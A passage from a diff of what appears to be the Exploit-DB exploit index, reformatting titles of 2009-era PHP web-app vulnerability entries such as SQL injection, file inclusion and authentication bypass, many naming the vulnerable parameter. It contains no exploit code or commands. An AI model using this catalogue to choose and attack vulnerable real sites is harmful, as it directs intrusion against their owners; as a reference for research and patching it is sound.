9271,platforms/php/webapps/9271.txt,"Inout Adserver - 'id' SQL Injection",2009-07-27,boom3rang,php,webapps,0 9273,platforms/php/webapps/9273.php,"Allomani Mobile 2.5 - Blind SQL Injection",2009-07-27,Qabandi,php,webapps,0 9274,platforms/php/webapps/9274.php,"Allomani Songs & Clips 2.7.0 - Blind SQL Injection",2009-07-27,Qabandi,php,webapps,0 @@ -22139,38 +22140,38 @@ id,file,description,date,author,platform,type,port 9279,platforms/php/webapps/9279.pl,"PunBB Automatic Image Upload 1.3.5 - SQL Injection",2009-07-27,Dante90,php,webapps,0 9280,platforms/php/webapps/9280.pl,"PunBB Automatic Image Upload 1.3.5 - Arbitrary File Delete",2009-07-27,Dante90,php,webapps,0 9281,platforms/php/webapps/9281.txt,"Limny 1.01 - Authentication Bypass",2009-07-27,SirGod,php,webapps,0 -9282,platforms/php/webapps/9282.txt,"Magician Blog 1.0 - (ids) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0 +9282,platforms/php/webapps/9282.txt,"Magician Blog 1.0 - 'ids' SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0 9283,platforms/php/webapps/9283.txt,"Magician Blog 1.0 - Authentication Bypass",2009-07-27,Evil-Cod3r,php,webapps,0 9284,platforms/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusions",2009-07-27,GoLd_M,php,webapps,0 -9287,platforms/php/webapps/9287.txt,"PHP Paid 4 Mail Script - 'paidbanner.php ID' SQL Injection",2009-07-28,"ThE g0bL!N",php,webapps,0 +9287,platforms/php/webapps/9287.txt,"PHP Paid 4 Mail Script - 'paidbanner.php?ID' SQL Injection",2009-07-28,"ThE g0bL!N",php,webapps,0 9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 - 'id' SQL Injection",2009-07-28,MizoZ,php,webapps,0 9289,platforms/php/webapps/9289.pl,"PunBB Reputation.php Mod 2.0.4 - Blind SQL Injection",2009-07-28,Dante90,php,webapps,0 9290,platforms/php/webapps/9290.txt,"In-portal 4.3.1 - Arbitrary File Upload",2009-07-28,Mr.tro0oqy,php,webapps,0 -9292,platforms/php/webapps/9292.txt,"PaoLink 1.0 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 -9293,platforms/php/webapps/9293.txt,"PaoBacheca Guestbook 2.1 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 -9294,platforms/php/webapps/9294.txt,"PaoLiber 1.1 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 +9292,platforms/php/webapps/9292.txt,"PaoLink 1.0 - 'login_ok' Authentication Bypass",2009-07-28,SirGod,php,webapps,0 +9293,platforms/php/webapps/9293.txt,"PaoBacheca Guestbook 2.1 - 'login_ok' Authentication Bypass",2009-07-28,SirGod,php,webapps,0 +9294,platforms/php/webapps/9294.txt,"PaoLiber 1.1 - 'login_ok' Authentication Bypass",2009-07-28,SirGod,php,webapps,0 9296,platforms/php/webapps/9296.txt,"TinyBrowser (TinyMCE Editor File browser) 1.41.6 - Multiple Vulnerabilities",2009-07-28,"Aung Khant",php,webapps,0 9297,platforms/php/webapps/9297.txt,"ultrize timesheet 1.2.2 - Remote File Inclusion",2009-07-28,NoGe,php,webapps,0 9307,platforms/php/webapps/9307.txt,"Ultrize TimeSheet 1.2.2 - 'readfile()' Local File Disclosure",2009-07-30,GoLd_M,php,webapps,0 -9308,platforms/php/webapps/9308.txt,"justVisual 1.2 - (fs_jVroot) Remote File Inclusion",2009-07-30,SirGod,php,webapps,0 +9308,platforms/php/webapps/9308.txt,"justVisual 1.2 - 'fs_jVroot' Remote File Inclusion",2009-07-30,SirGod,php,webapps,0 9309,platforms/php/webapps/9309.txt,"Orbis CMS 1.0 - File Delete / Download File / Arbitrary File Upload / SQL Injection",2009-07-30,SirGod,php,webapps,0 -9310,platforms/php/webapps/9310.txt,"dit.cms 1.3 - (path/sitemap/relPath) Local File Inclusion",2009-07-30,SirGod,php,webapps,0 +9310,platforms/php/webapps/9310.txt,"dit.cms 1.3 - 'path/sitemap/relPath' Local File Inclusion",2009-07-30,SirGod,php,webapps,0 9311,platforms/php/webapps/9311.txt,"cmsphp 0.21 - Local File Inclusion / Cross-Site Scripting",2009-07-30,SirGod,php,webapps,0 9312,platforms/php/webapps/9312.txt,"d.net CMS - Local File Inclusion / SQL Injection",2009-07-30,SirGod,php,webapps,0 9313,platforms/php/webapps/9313.txt,"Really Simple CMS 0.3a - 'PT' Local File Inclusion",2009-07-30,SirGod,php,webapps,0 9314,platforms/php/webapps/9314.txt,"MUJE CMS 1.0.4.34 - Local File Inclusion",2009-07-30,SirGod,php,webapps,0 9315,platforms/php/webapps/9315.pl,"PunBB Reputation.php Mod 2.0.4 - Local File Inclusion",2009-07-30,Dante90,php,webapps,0 -9316,platforms/php/webapps/9316.txt,"linkSpheric 0.74b6 - (listID) SQL Injection",2009-07-30,NoGe,php,webapps,0 +9316,platforms/php/webapps/9316.txt,"linkSpheric 0.74b6 - 'listID' SQL Injection",2009-07-30,NoGe,php,webapps,0 9320,platforms/php/webapps/9320.php,"Arab Portal 2.x - 'forum.php' SQL Injection",2009-08-01,rEcruit,php,webapps,0 9322,platforms/php/webapps/9322.txt,"MAXcms 3.11.20b - Multiple Remote File Inclusions",2009-08-01,NoGe,php,webapps,0 9324,platforms/php/webapps/9324.txt,"Joomla! Component com_jfusion - 'itemID' Blind SQL Injection",2009-08-01,"Chip d3 bi0s",php,webapps,0 9325,platforms/php/webapps/9325.txt,"PortalXP Teacher Edition 1.2 - Multiple SQL Injections",2009-08-01,SirGod,php,webapps,0 -9326,platforms/php/webapps/9326.txt,"aa33code 0.0.1 - (Local File Inclusion / Authentication Bypass / File Disclosure) Multiple Remote Vulnerabilities",2009-08-01,SirGod,php,webapps,0 +9326,platforms/php/webapps/9326.txt,"aa33code 0.0.1 - Local File Inclusion / Authentication Bypass / File Disclosure",2009-08-01,SirGod,php,webapps,0 9327,platforms/php/webapps/9327.txt,"mobilelib gold 3.0 - Authentication Bypass / SQL Injection",2009-08-01,SwEET-DeViL,php,webapps,0 9328,platforms/asp/webapps/9328.txt,"AW BannerAd - Authentication Bypass",2009-08-03,Ro0T-MaFia,asp,webapps,0 -9331,platforms/php/webapps/9331.txt,"ProjectButler 1.5.0 - 'pda_projects.php offset' Remote File Inclusion",2009-08-03,cr4wl3r,php,webapps,0 +9331,platforms/php/webapps/9331.txt,"ProjectButler 1.5.0 - 'pda_projects.php?offset' Remote File Inclusion",2009-08-03,cr4wl3r,php,webapps,0 9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script - Authentication Bypass",2009-08-03,Cicklow,php,webapps,0 -9333,platforms/php/webapps/9333.txt,"Netpet CMS 1.9 - 'confirm.php language' Local File Inclusion",2009-08-03,SirGod,php,webapps,0 +9333,platforms/php/webapps/9333.txt,"Netpet CMS 1.9 - 'confirm.php?language' Local File Inclusion",2009-08-03,SirGod,php,webapps,0 9334,platforms/php/webapps/9334.txt,"QuickDev 4 - 'download.php' File Disclosure",2009-08-03,SirGod,php,webapps,0 9335,platforms/php/webapps/9335.txt,"TT Web Site Manager 0.5 - Authentication Bypass",2009-08-03,SirGod,php,webapps,0 9336,platforms/php/webapps/9336.txt,"SimpleLoginSys 0.5 - Authentication Bypass",2009-08-03,SirGod,php,webapps,0 @@ -22180,36 +22181,36 @@ id,file,description,date,author,platform,type,port 9340,platforms/php/webapps/9340.txt,"x10 media adult script 1.7 - Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - Authentication Bypass",2009-08-03,snakespc,php,webapps,0 9342,platforms/php/webapps/9342.txt,"elvin bts 1.2.2 - SQL Injection / Cross-Site Scripting",2009-08-03,"599eme Man",php,webapps,0 -9344,platforms/php/webapps/9344.txt,"Multi Website 1.5 - (index PHP action) SQL Injection",2009-08-03,SarBoT511,php,webapps,0 +9344,platforms/php/webapps/9344.txt,"Multi Website 1.5 - index PHP action SQL Injection",2009-08-03,SarBoT511,php,webapps,0 9347,platforms/php/webapps/9347.txt,"Arab Portal 2.2 - 'mod.php' Local File Inclusion",2009-08-03,Qabandi,php,webapps,0 9348,platforms/php/webapps/9348.txt,"Blink Blog System - Authentication Bypass",2009-08-03,"Salvatore Fresta",php,webapps,0 -9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 - 'index.php more' SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0 +9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 - 'index.php?more' SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0 9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b - Remote File Inclusion / File Disclosure",2009-08-03,GoLd_M,php,webapps,0 9351,platforms/php/webapps/9351.txt,"Payment Processor Script (PPScript) - 'shop.htm cid' SQL Injection",2009-08-03,ZoRLu,php,webapps,0 9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - Authentication Bypass",2009-08-04,SirGod,php,webapps,0 9355,platforms/php/webapps/9355.txt,"elgg 1.5 - '/_css/js.php' Local File Inclusion",2009-08-04,eLwaux,php,webapps,0 9356,platforms/php/webapps/9356.txt,"ShopMaker CMS 2.0 - Blind SQL Injection / Local File Inclusion",2009-08-04,PLATEN,php,webapps,0 9357,platforms/cgi/webapps/9357.txt,"Perl$hop E-Commerce Script - Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0 -9358,platforms/php/webapps/9358.txt,"In-portal 4.3.1 - 'index.php env' Local File Inclusion",2009-08-04,"Angela Chang",php,webapps,0 +9358,platforms/php/webapps/9358.txt,"In-portal 4.3.1 - 'index.php?env' Local File Inclusion",2009-08-04,"Angela Chang",php,webapps,0 9365,platforms/php/webapps/9365.txt,"mybackup 1.4.0 - File Download / Remote File Inclusion",2009-08-05,SirGod,php,webapps,0 9367,platforms/php/webapps/9367.txt,"tenrok 1.1.0 - File Disclosure / Remote Code Execution",2009-08-05,SirGod,php,webapps,0 9369,platforms/php/webapps/9369.txt,"Irokez CMS 0.7.1 - SQL Injection",2009-08-05,Ins3t,php,webapps,0 9370,platforms/php/webapps/9370.txt,"AccessoriesMe PHP Affiliate Script 1.4 - Blind SQL Injection / Cross-Site Scripting",2009-08-05,Moudi,php,webapps,0 9371,platforms/php/webapps/9371.txt,"opennews 1.0 - SQL Injection / Remote Code Execution",2009-08-05,SirGod,php,webapps,0 -9372,platforms/php/webapps/9372.txt,"Portel 2008 - 'decide.php patron' Blind SQL Injection",2009-08-05,"Chip d3 bi0s",php,webapps,0 +9372,platforms/php/webapps/9372.txt,"Portel 2008 - 'decide.php?patron' Blind SQL Injection",2009-08-05,"Chip d3 bi0s",php,webapps,0 9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster - Topic Delete / Cross-Site Scripting",2009-08-06,int_main();,php,webapps,0 9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - 'showUid' SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0 9383,platforms/php/webapps/9383.txt,"LM Starmail 2.0 - SQL Injection / File Inclusion",2009-08-06,int_main();,php,webapps,0 9384,platforms/php/webapps/9384.txt,"Alwasel 1.5 - Multiple SQL Injections",2009-08-07,SwEET-DeViL,php,webapps,0 9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery 1.0 - Authentication Bypass",2009-08-07,Red-D3v1L,php,webapps,0 -9387,platforms/php/webapps/9387.txt,"Banner Exchange Script 1.0 - (targetid) Blind SQL Injection",2009-08-07,"599eme Man",php,webapps,0 -9389,platforms/php/webapps/9389.txt,"Logoshows BBS 2.0 - (forumid) SQL Injection",2009-08-07,Ruzgarin_Oglu,php,webapps,0 +9387,platforms/php/webapps/9387.txt,"Banner Exchange Script 1.0 - 'targetid' Blind SQL Injection",2009-08-07,"599eme Man",php,webapps,0 +9389,platforms/php/webapps/9389.txt,"Logoshows BBS 2.0 - 'forumid' SQL Injection",2009-08-07,Ruzgarin_Oglu,php,webapps,0 9390,platforms/php/webapps/9390.txt,"Typing Pal 1.0 - 'idTableProduit' SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0 9394,platforms/php/webapps/9394.pl,"Arab Portal 2.2 - (Authentication Bypass) Blind SQL Injection",2009-08-07,"Jafer Al Zidjali",php,webapps,0 9395,platforms/php/webapps/9395.txt,"PHPCityPortal - Authentication Bypass",2009-08-07,CoBRa_21,php,webapps,0 -9396,platforms/php/webapps/9396.txt,"Facil Helpdesk - (Local File Inclusion / Remote File Inclusion / Cross-Site Scripting) Multiples Remote Vulnerabilities",2009-08-07,Moudi,php,webapps,0 -9397,platforms/php/webapps/9397.txt,"IsolSoft Support Center 2.5 - (Local File Inclusion / Remote File Inclusion / Cross-Site Scripting) Multiples Vulnerabilities",2009-08-07,Moudi,php,webapps,0 -9398,platforms/php/webapps/9398.php,"Joomla! Component com_pms 2.0.4 - (Ignore-List) SQL Injection",2009-08-07,M4dhead,php,webapps,0 +9396,platforms/php/webapps/9396.txt,"Facil Helpdesk - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 +9397,platforms/php/webapps/9397.txt,"IsolSoft Support Center 2.5 - Local File Inclusion / Remote File Inclusion / Cross-Site Scripting",2009-08-07,Moudi,php,webapps,0 +9398,platforms/php/webapps/9398.php,"Joomla! Component com_pms 2.0.4 - 'Ignore-List' SQL Injection",2009-08-07,M4dhead,php,webapps,0 9399,platforms/php/webapps/9399.txt,"Logoshows BBS 2.0 - Authentication Bypass",2009-08-07,Dns-Team,php,webapps,0 9400,platforms/php/webapps/9400.txt,"logoshows bbs 2.0 - File Disclosure / Insecure Cookie Handling",2009-08-07,ZoRLu,php,webapps,0 9404,platforms/php/webapps/9404.txt,"SmilieScript 1.0 - Authentication Bypass",2009-08-10,Mr.tro0oqy,php,webapps,0 @@ -22219,7 +22220,7 @@ id,file,description,date,author,platform,type,port 9408,platforms/php/webapps/9408.php,"Joomla! Component Kunena Forums (com_kunena) - Blind SQL Injection",2009-08-10,"ilker Kandemir",php,webapps,0 9410,platforms/php/webapps/9410.txt,"WordPress 2.8.3 - Remote Admin Reset Password",2009-08-11,"laurent gaffié",php,webapps,0 9413,platforms/php/webapps/9413.txt,"Joomla! Component idoblog 1.1b30 (com_idoblog) - SQL Injection",2009-08-11,kkr,php,webapps,0 -9416,platforms/php/webapps/9416.txt,"OCS Inventory NG 1.2.1 - (systemid) SQL Injection",2009-08-11,"Guilherme Marinheiro",php,webapps,0 +9416,platforms/php/webapps/9416.txt,"OCS Inventory NG 1.2.1 - 'systemid' SQL Injection",2009-08-11,"Guilherme Marinheiro",php,webapps,0 9419,platforms/php/webapps/9419.txt,"Shorty 0.7.1b - (Authentication Bypass) Insecure Cookie Handling",2009-08-12,"Pedro Laguna",php,webapps,0 9421,platforms/php/webapps/9421.txt,"Gallarific 1.1 - '/gallery.php' Arbitrary Delete/Edit Category",2009-08-12,"ilker Kandemir",php,webapps,0 9424,platforms/php/webapps/9424.txt,"Plume CMS 1.2.3 - Multiple SQL Injections",2009-08-12,"Sense of Security",php,webapps,0 @@ -22228,9 +22229,9 @@ id,file,description,date,author,platform,type,port 9431,platforms/php/webapps/9431.txt,"WordPress Plugin WP-Syntax 0.9.1 - Remote Command Execution",2009-08-27,Raz0r,php,webapps,0 9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Arbitrary File Upload",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0 9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x - Cross-Site Scripting / SQL Injection / File Disclosure",2009-08-13,[]ViZiOn,php,webapps,0 -9437,platforms/php/webapps/9437.txt,"Ignition 1.2 - (comment) Remote Code Injection",2009-08-14,"Khashayar Fereidani",php,webapps,0 -9438,platforms/php/webapps/9438.txt,"PHP Competition System 0.84 - (competition) SQL Injection",2009-08-14,Mr.SQL,php,webapps,0 -9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 - (nFileId) SQL Injection",2009-08-14,Mr.tro0oqy,php,webapps,0 +9437,platforms/php/webapps/9437.txt,"Ignition 1.2 - 'comment' Remote Code Injection",2009-08-14,"Khashayar Fereidani",php,webapps,0 +9438,platforms/php/webapps/9438.txt,"PHP Competition System 0.84 - 'competition' SQL Injection",2009-08-14,Mr.SQL,php,webapps,0 +9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 - 'nFileId' SQL Injection",2009-08-14,Mr.tro0oqy,php,webapps,0 9441,platforms/php/webapps/9441.txt,"MyWeight 1.0 - Arbitrary File Upload",2009-08-14,Mr.tro0oqy,php,webapps,0 9444,platforms/php/webapps/9444.txt,"PHP-Lance 1.52 - Multiple Local File Inclusions",2009-08-18,jetli007,php,webapps,0 9445,platforms/php/webapps/9445.py,"BaBB 2.8 - Remote Code Injection",2009-08-18,"Khashayar Fereidani",php,webapps,0 @@ -22242,76 +22243,76 @@ id,file,description,date,author,platform,type,port 9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - 'UploadID' SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Authentication Bypass / Password Reset (2)",2009-08-18,bugz,php,webapps,0 9460,platforms/php/webapps/9460.txt,"autonomous lan party 0.98.3 - Remote File Inclusion",2009-08-18,cr4wl3r,php,webapps,0 -9461,platforms/php/webapps/9461.txt,"E CMS 1.0 - 'index.php s' SQL Injection",2009-08-18,Red-D3v1L,php,webapps,0 +9461,platforms/php/webapps/9461.txt,"E CMS 1.0 - 'index.php?s' SQL Injection",2009-08-18,Red-D3v1L,php,webapps,0 9462,platforms/php/webapps/9462.txt,"Infinity 2.x.x - options[style_dir] Local File Disclosure",2009-08-18,SwEET-DeViL,php,webapps,0 9463,platforms/php/webapps/9463.php,"Joomla! Component MisterEstate - Blind SQL Injection",2009-08-18,jdc,php,webapps,0 -9464,platforms/php/webapps/9464.txt,"Fotoshow PRO - (category) SQL Injection",2009-08-18,darkmasking,php,webapps,0 +9464,platforms/php/webapps/9464.txt,"Fotoshow PRO - 'category' SQL Injection",2009-08-18,darkmasking,php,webapps,0 9465,platforms/php/webapps/9465.txt,"phpfreeBB 1.0 - Blind SQL Injection",2009-08-18,Moudi,php,webapps,0 9469,platforms/php/webapps/9469.txt,"Ultimate Fade-in Slideshow 1.51 - Arbitrary File Upload",2009-08-18,"NeX HaCkEr",php,webapps,0 -9470,platforms/php/webapps/9470.txt,"PHP Email Manager - 'remove.php ID' SQL Injection",2009-08-18,MuShTaQ,php,webapps,0 +9470,platforms/php/webapps/9470.txt,"PHP Email Manager - 'remove.php?ID' SQL Injection",2009-08-18,MuShTaQ,php,webapps,0 9471,platforms/php/webapps/9471.txt,"CBAuthority - ClickBank Affiliate Management SQL Injection",2009-08-18,"Angela Chang",php,webapps,0 9472,platforms/php/webapps/9472.txt,"Best Dating Script - Arbitrary File Upload",2009-08-18,jetli007,php,webapps,0 9474,platforms/php/webapps/9474.rb,"Traidnt UP 2.0 - SQL Injection",2009-08-18,"Jafer Al Zidjali",php,webapps,0 9475,platforms/php/webapps/9475.txt,"asaher pro 1.0.4 - Remote Database Backup",2009-08-18,alnjm33,php,webapps,0 -9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 - (gallery_id) SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0 +9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 - 'gallery_id' SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0 9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Authentication Bypass) Insecure Cookie Handling",2009-08-24,Mr.tro0oqy,php,webapps,0 -9484,platforms/php/webapps/9484.txt,"PHP Dir Submit - (aid) SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0 -9485,platforms/php/webapps/9485.txt,"Cuteflow 2.10.3 - edituser.php Security Bypass",2009-08-24,"Hever Costa Rocha",php,webapps,0 +9484,platforms/php/webapps/9484.txt,"PHP Dir Submit - 'aid' SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0 +9485,platforms/php/webapps/9485.txt,"Cuteflow 2.10.3 - 'edituser.php' Security Bypass",2009-08-24,"Hever Costa Rocha",php,webapps,0 9490,platforms/php/webapps/9490.txt,"Lanai Core 0.6 - Remote File Disclosure / Info Disclosure",2009-08-24,"Khashayar Fereidani",php,webapps,0 9491,platforms/php/webapps/9491.txt,"Dow Group - 'new.php' SQL Injection",2009-11-16,ProF.Code,php,webapps,0 9493,platforms/php/webapps/9493.txt,"Uebimiau Webmail 3.2.0-2.0 - Arbitrary Database Disclosure",2009-08-24,Septemb0x,php,webapps,0 9494,platforms/php/webapps/9494.txt,"humanCMS - Authentication Bypass",2009-08-24,next,php,webapps,0 9497,platforms/php/webapps/9497.pl,"ITechBids 8.0 - 'ProductID' Blind SQL Injection",2009-08-24,Mr.SQL,php,webapps,0 9499,platforms/php/webapps/9499.txt,"New5starRating 1.0 - 'rating.php' SQL Injection",2009-08-24,Bgh7,php,webapps,0 -9502,platforms/php/webapps/9502.txt,"Joomla! Component com_ninjamonial 1.1 - (testimID) SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0 -9504,platforms/php/webapps/9504.txt,"Joomla! Component com_jtips 1.0.x - (season) Blind SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0 +9502,platforms/php/webapps/9502.txt,"Joomla! Component com_ninjamonial 1.1 - 'testimID' SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0 +9504,platforms/php/webapps/9504.txt,"Joomla! Component com_jtips 1.0.x - 'season' Blind SQL Injection",2009-08-24,"Chip d3 bi0s",php,webapps,0 9505,platforms/php/webapps/9505.txt,"Geeklog 1.6.0sr1 - Arbitrary File Upload",2009-08-24,JaL0h,php,webapps,0 9510,platforms/php/webapps/9510.txt,"Joomla! Component com_siirler 1.2 - 'sid' SQL Injection",2009-08-25,v3n0m,php,webapps,0 9511,platforms/php/webapps/9511.txt,"Turnkey Arcade Script - SQL Injection (2)",2009-08-25,Red-D3v1L,php,webapps,0 9512,platforms/php/webapps/9512.txt,"TCPDB 3.8 - Remote Content Change Bypass",2009-08-25,Securitylab.ir,php,webapps,0 40383,platforms/asp/webapps/40383.txt,"Cisco EPC 3925 - Multiple Vulnerabilities",2016-09-15,"Patryk Bogdan",asp,webapps,80 -9518,platforms/php/webapps/9518.txt,"EMO Breader Manager - 'video.php movie' SQL Injection",2009-08-25,Mr.SQL,php,webapps,0 +9518,platforms/php/webapps/9518.txt,"EMO Breader Manager - 'video.php?movie' SQL Injection",2009-08-25,Mr.SQL,php,webapps,0 9522,platforms/php/webapps/9522.txt,"Moa Gallery 1.2.0 - Multiple Remote File Inclusions",2009-08-26,cr4wl3r,php,webapps,0 -9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 - 'index.php action' SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 +9523,platforms/php/webapps/9523.txt,"Moa Gallery 1.2.0 - 'index.php?action' SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 9524,platforms/php/webapps/9524.txt,"totalcalendar 2.4 - Blind SQL Injection / Local File Inclusion",2009-08-26,Moudi,php,webapps,0 -9525,platforms/php/webapps/9525.txt,"Moa Gallery 1.2.0 - (p_filename) Remote File Disclosure",2009-08-26,GoLd_M,php,webapps,0 +9525,platforms/php/webapps/9525.txt,"Moa Gallery 1.2.0 - 'p_filename' Remote File Disclosure",2009-08-26,GoLd_M,php,webapps,0 9527,platforms/php/webapps/9527.txt,"Simple CMS Framework 1.0 - 'page' SQL Injection",2009-08-26,Red-D3v1L,php,webapps,0 -9529,platforms/php/webapps/9529.txt,"Discuz! Plugin Crazy Star 2.0 - (fmid) SQL Injection",2009-08-26,ZhaoHuAn,php,webapps,0 +9529,platforms/php/webapps/9529.txt,"Discuz! Plugin Crazy Star 2.0 - 'fmid' SQL Injection",2009-08-26,ZhaoHuAn,php,webapps,0 9530,platforms/php/webapps/9530.txt,"Open Auto Classifieds 1.5.9 - Multiple Vulnerabilities",2009-08-26,"Andrew Horton",php,webapps,0 -9531,platforms/php/webapps/9531.txt,"PAD Site Scripts 3.6 - 'list.php string' SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 -9532,platforms/php/webapps/9532.txt,"allomani 2007 - (cat) SQL Injection",2009-08-26,"NeX HaCkEr",php,webapps,0 +9531,platforms/php/webapps/9531.txt,"PAD Site Scripts 3.6 - 'list.php?string' SQL Injection",2009-08-26,Mr.SQL,php,webapps,0 +9532,platforms/php/webapps/9532.txt,"allomani 2007 - 'cat' SQL Injection",2009-08-26,"NeX HaCkEr",php,webapps,0 9533,platforms/php/webapps/9533.txt,"PHPSANE 0.5.0 - 'save.php' Remote File Inclusion",2009-08-26,CoBRa_21,php,webapps,0 9534,platforms/php/webapps/9534.txt,"Joomla! Component com_digifolio 1.52 - 'id' SQL Injection",2009-08-27,v3n0m,php,webapps,0 9535,platforms/php/webapps/9535.txt,"Uiga Church Portal - 'year' SQL Injection",2009-08-27,Mr.SQL,php,webapps,0 9538,platforms/php/webapps/9538.txt,"Silurus Classifieds System - 'category.php' SQL Injection",2009-08-28,Mr.SQL,php,webapps,0 -9544,platforms/php/webapps/9544.txt,"Modern Script 5.0 - 'index.php s' SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0 -9552,platforms/php/webapps/9552.txt,"Re-Script 0.99 Beta - 'listings.php op' SQL Injection",2009-08-31,Mr.SQL,php,webapps,0 +9544,platforms/php/webapps/9544.txt,"Modern Script 5.0 - 'index.php?s' SQL Injection",2009-08-31,Red-D3v1L,php,webapps,0 +9552,platforms/php/webapps/9552.txt,"Re-Script 0.99 Beta - 'listings.php?op' SQL Injection",2009-08-31,Mr.SQL,php,webapps,0 9553,platforms/php/webapps/9553.txt,"Rock Band CMS 0.10 - 'news.php' Multiple SQL Injections (1)",2009-08-31,Affix,php,webapps,0 9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX - 'spnews.php' SQL Injection",2009-08-31,HxH,php,webapps,0 9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a - Code Execution",2009-08-31,flyh4t,php,webapps,0 9562,platforms/asp/webapps/9562.txt,"JSFTemplating / Mojarra Scales / GlassFish - File Disclosure",2009-09-01,"SEC Consult",asp,webapps,0 -9563,platforms/php/webapps/9563.txt,"Joomla! Component com_artportal 1.0 - (portalid) SQL Injection",2009-09-01,"599eme Man",php,webapps,0 +9563,platforms/php/webapps/9563.txt,"Joomla! Component com_artportal 1.0 - 'portalid' SQL Injection",2009-09-01,"599eme Man",php,webapps,0 9564,platforms/php/webapps/9564.txt,"Joomla! Component Agora 3.0.0b (com_agora) - Local File Inclusion",2009-09-01,ByALBAYX,php,webapps,0 -9565,platforms/php/webapps/9565.txt,"Xstate Real Estate 1.0 - (Blind SQL Injection / Cross-Site Scripting) Multiples Vulnerabilities",2009-09-01,Moudi,php,webapps,0 +9565,platforms/php/webapps/9565.txt,"Xstate Real Estate 1.0 - Blind SQL Injection / Cross-Site Scripting",2009-09-01,Moudi,php,webapps,0 9566,platforms/php/webapps/9566.txt,"KingCMS 0.6.0 - 'menu.php' Remote File Inclusion",2009-09-01,CoBRa_21,php,webapps,0 9569,platforms/php/webapps/9569.txt,"phpBB3 - addon prime_quick_style GetAdmin",2009-09-01,-SmoG-,php,webapps,0 9570,platforms/php/webapps/9570.txt,"Ve-EDIT 0.1.4 - 'debug_PHP.php' Local File Inclusion",2009-09-01,CoBRa_21,php,webapps,0 9571,platforms/php/webapps/9571.txt,"Joomla! Component com_gameserver 1.0 - 'id' SQL Injection",2009-09-01,v3n0m,php,webapps,0 9572,platforms/php/webapps/9572.txt,"DataLife Engine 8.2 - dle_config_api Remote File Inclusion",2009-09-01,Kurd-Team,php,webapps,0 9576,platforms/php/webapps/9576.txt,"Discuz! Plugin JiangHu 1.1 - 'id' SQL Injection",2009-09-02,ZhaoHuAn,php,webapps,0 -9577,platforms/php/webapps/9577.txt,"Ve-EDIT 0.1.4 - (highlighter) Remote File Inclusion",2009-09-02,RoMaNcYxHaCkEr,php,webapps,0 +9577,platforms/php/webapps/9577.txt,"Ve-EDIT 0.1.4 - 'highlighter' Remote File Inclusion",2009-09-02,RoMaNcYxHaCkEr,php,webapps,0 9578,platforms/php/webapps/9578.txt,"PHP Live! 3.3 - 'deptid' SQL Injection",2009-09-02,v3n0m,php,webapps,0 9582,platforms/php/webapps/9582.txt,"FreeSchool 1.1.0 - Multiple Remote File Inclusions",2009-09-03,cr4wl3r,php,webapps,0 9583,platforms/php/webapps/9583.txt,"PHPope 1.0.0 - Multiple Remote File Inclusions",2009-09-03,cr4wl3r,php,webapps,0 9588,platforms/php/webapps/9588.txt,"Mambo Component com_zoom - 'catid' Blind SQL Injection",2009-09-04,boom3rang,php,webapps,0 9590,platforms/php/webapps/9590.c,"ZeroBoard 4.1 pl7 - 'now_connect()' Remote Code Execution",2009-09-04,SpeeDr00t,php,webapps,0 9591,platforms/php/webapps/9591.txt,"Ticket Support Script - 'ticket.php' Arbitrary File Upload",2009-09-04,InjEctOr5,php,webapps,0 -9593,platforms/php/webapps/9593.txt,"Joomla! Component com_Joomlaub - (aid) SQL Injection",2009-09-04,"599eme Man",php,webapps,0 +9593,platforms/php/webapps/9593.txt,"Joomla! Component com_Joomlaub - 'aid' SQL Injection",2009-09-04,"599eme Man",php,webapps,0 9599,platforms/php/webapps/9599.txt,"The Rat CMS Alpha 2 - Arbitrary File Upload",2009-09-09,Securitylab.ir,php,webapps,0 9600,platforms/php/webapps/9600.txt,"OBOphiX 2.7.0 - 